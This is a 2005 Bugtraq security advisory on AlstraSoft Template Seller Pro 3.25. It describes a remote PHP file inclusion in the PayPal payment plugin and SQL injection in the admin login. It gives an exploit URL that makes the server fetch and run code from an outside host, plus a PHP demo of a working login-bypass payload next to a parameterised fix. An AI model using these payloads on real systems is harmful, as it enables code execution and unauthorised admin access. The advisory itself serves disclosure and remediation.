List: bugtraq
Subject: Template Seller Pro 3.25
From: r.verton () gmail ! com
Date: 2005-11-15 19:39:01
Message-ID: 20051115193901.15910.qmail () securityfocus ! com
AlstraSoft Template Seller Pro 3.25
===================================
Software: AlstraSoft Template Seller Pro 3.25
Severity: Arbitrary code execution, SQL Injection(s)
Risk: High
Author: Robin Verton <r.verton@gmail.com>
Date: Nov. 15 2005
Vendor: www.alstrasoft.com
Description:
Ever thought of starting your very own profitable shopping cart business just like TemplateMonster.com? With AlstraSoft Template Seller Pro software, you can run your own templates store selling templates such as website templates, logo templates, flash intro templates, frontpage templates and many more! The flexibility of Template Seller Pro software also allows you to run a membership based templates business just like BoxedArt.com by offering paid members multiple templates download instantly. [http://www.alstrasoft.com/]
Details:
1) /include/paymentplugins/payment_paypal.php
/**
Paypal payment plugin
*/
global $config,$conn;
include("$config[basepath]/include/payment/class.paypal_ipn.php");
include("$config[basepath]/include/paymentplugins/paymentplugin.php");
The file can be requested directly, and nothing in it initialises $config; it only declares the variable global. With register_globals enabled, an attacker therefore sets $config[basepath] from the query string, and include() fetches and executes PHP code from a host of the attacker's choice (a remote include like this needs allow_url_fopen, which PHP enabled by default at the time). This is very dangerous: if safe_mode is off and command execution is not restricted, the attacker runs code with the web server's privileges and can read every file the server can.
http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?
Because of the trailing '?', the rest of the include argument, '/include/payment/class.paypal_ipn.php', is sent to the attacker's server as a query string rather than being appended to the path, so only the file named in $config[basepath] is included. The remote file is served as plain text (hence the .txt extension) so that the attacker's own server does not execute it; the victim's PHP does.
2) /admin/index.php
$sql_user_name = $user_name;
$md5_pass = md5($user_pass);
$sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'";
The username submitted by the user is placed into the query without any validation or escaping (only the password passes through md5()), so an attacker can change the meaning of the WHERE clause, for example to bypass the admin login.
Nearly no user-submitted variable in the application is validated, so a few more SQL injections are possible.
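The following is an added example, not code from the advisory or from AlstraSoft, that runs the login query from admin/index.php as written beside a parameterised replacement. It uses an in-memory SQLite database through PDO as a stand-in for MySQL; the UserDB row, the credentials and the crafted username are all constructed for the demonstration.

```php
<?php
// Added example, not AlstraSoft code: the admin/index.php login query built
// by string interpolation, and a prepared-statement replacement.

// Constructed test database: one admin row, password stored as md5().
function setup(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE UserDB (user_name TEXT, user_password TEXT)');
    $db->exec("INSERT INTO UserDB VALUES ('admin', '" . md5('s3cret') . "')");
    return $db;
}

// As in the advisory: $user_name lands in the SQL unescaped; $user_pass is
// hashed first, so the username is the only injection point.
function vulnerable_login(PDO $db, string $user_name, string $user_pass): bool
{
    $sql_user_name = $user_name;
    $md5_pass = md5($user_pass);
    $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'";
    return $db->query($sql)->fetch() !== false;
}

// Fixed: the username travels as a bound parameter, never as SQL text.
function safe_login(PDO $db, string $user_name, string $user_pass): bool
{
    $stmt = $db->prepare('SELECT * FROM UserDB WHERE user_name = ? AND user_password = ?');
    $stmt->execute([$user_name, md5($user_pass)]);
    return $stmt->fetch() !== false;
}

$db = setup();

// Honest attempts with a wrong password.
var_dump(vulnerable_login($db, 'admin', 'wrong'));
var_dump(safe_login($db, 'admin', 'wrong'));

// Crafted username. AND binds tighter than OR, so the password check is
// absorbed into the last OR branch and the WHERE clause becomes
//   user_name='x' OR 1=1 OR ('a'='' and user_password='<md5>')
// which is true for every row. A plain "' OR '1'='1" would not work here,
// because the trailing AND would still demand the correct password hash.
$payload = "x' OR 1=1 OR 'a'='";
var_dump(vulnerable_login($db, $payload, 'wrong'));
var_dump(safe_login($db, $payload, 'wrong'));
```

Run with the php CLI (pdo_sqlite is needed): the two honest attempts fail in both versions, the crafted username is accepted by vulnerable_login() and returns the admin row, and safe_login() rejects it because the payload is compared as a literal username. Escaping the value (what magic_quotes_gpc does) would also defeat this particular payload, but binding parameters removes the query-building step that makes the mistake possible.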
Patch:
Define a constant in the scripts that are meant to be requested directly and put the following check at the top of every file that is only meant to be included, so that files such as the payment plugins can no longer be reached by URL:
if( !defined('IN_SYS') ) {
    die('Hacking Attempt!');
}
and activate magic_quotes_gpc. Beyond that, register_globals should be off and $config initialised from the configuration file rather than left to request data, and values that reach a query should be escaped or bound as parameters at the point of use; magic_quotes_gpc only escapes quotes in incoming request data and is a stopgap, not a fix.
Credits:
Credit goes to Robin Verton
References:
[1] http://www.alstrasoft.com/template.htm
[2] http://myblog.it-security23.net